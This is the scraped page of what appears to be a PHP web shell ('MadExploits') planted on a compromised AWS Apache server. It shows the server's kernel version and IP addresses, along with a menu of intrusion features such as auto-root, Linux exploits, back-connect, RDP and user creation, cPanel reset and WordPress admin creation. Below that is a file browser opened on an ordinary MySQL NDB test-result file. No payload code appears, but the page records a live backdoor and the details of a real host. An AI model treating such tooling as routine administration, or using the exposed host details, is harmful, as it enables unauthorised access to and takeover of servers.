Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.133.117.5
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
ndbcluster /
[ HOME SHELL ]
Name
Size
Permission
Action
basic.result
721
B
-rw-r--r--
basic.test
753
B
-rw-r--r--
drop_table.result
68
B
-rw-r--r--
drop_table.test
318
B
-rw-r--r--
gis.result
53.07
KB
-rw-r--r--
gis.test
219
B
-rw-r--r--
my.cnf
435
B
-rw-r--r--
pushed_join.inc
7.48
KB
-rw-r--r--
pushed_join.result
1.67
KB
-rw-r--r--
pushed_join.test
2.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : basic.result
CREATE TABLE t1 ( a int PRIMARY KEY, b varchar(255) ) ENGINE = NDB; INSERT INTO t1 VALUES (1, "MySQL Server with NDB"); INSERT INTO t1 (a, b) VALUES (11, "Barrier effect"); INSERT INTO t1 (a, b) VALUES (12, "The third row"), (37, "And of course number 37"); SELECT * FROM t1 WHERE a = 1; a b 1 MySQL Server with NDB UPDATE t1 SET b = CONCAT(b, " test") WHERE a = 1; SELECT * FROM t1 WHERE a = 1; a b 1 MySQL Server with NDB test REPLACE t1 (a, b) VALUES (12, "Another layer"); SELECT * FROM t1 WHERE a = 12 ORDER BY a; a b 12 Another layer DELETE FROM t1 WHERE a = 11; SELECT COUNT(*) FROM t1; COUNT(*) 3 SELECT b FROM t1 WHERE b LIKE "MySQL%"; b MySQL Server with NDB test DELETE FROM t1 ORDER BY b DESC; DROP TABLE t1;
Close